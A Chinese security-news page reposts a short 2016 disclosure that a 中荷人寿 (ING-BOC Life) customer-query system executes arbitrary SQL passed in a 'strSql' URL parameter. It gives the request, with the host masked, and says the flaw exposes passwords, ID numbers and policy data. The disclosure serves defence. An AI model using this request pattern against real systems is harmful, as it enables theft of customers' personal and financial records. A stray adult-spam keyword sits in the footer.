頻道欄目
首頁 > 資訊 > 企業安全 > 正文

中荷人壽某系統設計不當可直接可執行SQL影響賬號密碼及大量客戶保單信息

16-07-18        來源:[db:作者]  
收藏   我要投稿

設計不當

**.**.**.**:8443/cusQuery/

 

QQ截圖20160530214733.png

 

**.**.**.**:8443/cusQuery/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select+TABLE_NAME,NUM_ROWS+from+tabs&strStart=1&LargeFlag=0

 

QQ截圖20160530214835.png

 

身份證信息&保單號

 

QQ截圖20160530214944.png

 

帳號密碼

 

QQ截圖20160530215135.png

 

解決方案:

補丁

相關TAG標簽
上一篇:海爾300M無線路由器后臺直接登錄(不需要任何認證)
下一篇:凱撒旅游VPN弱口令到內網漫游(N多內部系統從SQL注入到后臺登錄)
相關文章
圖文推薦

關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心

版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站

美女MM131爽爽爽毛片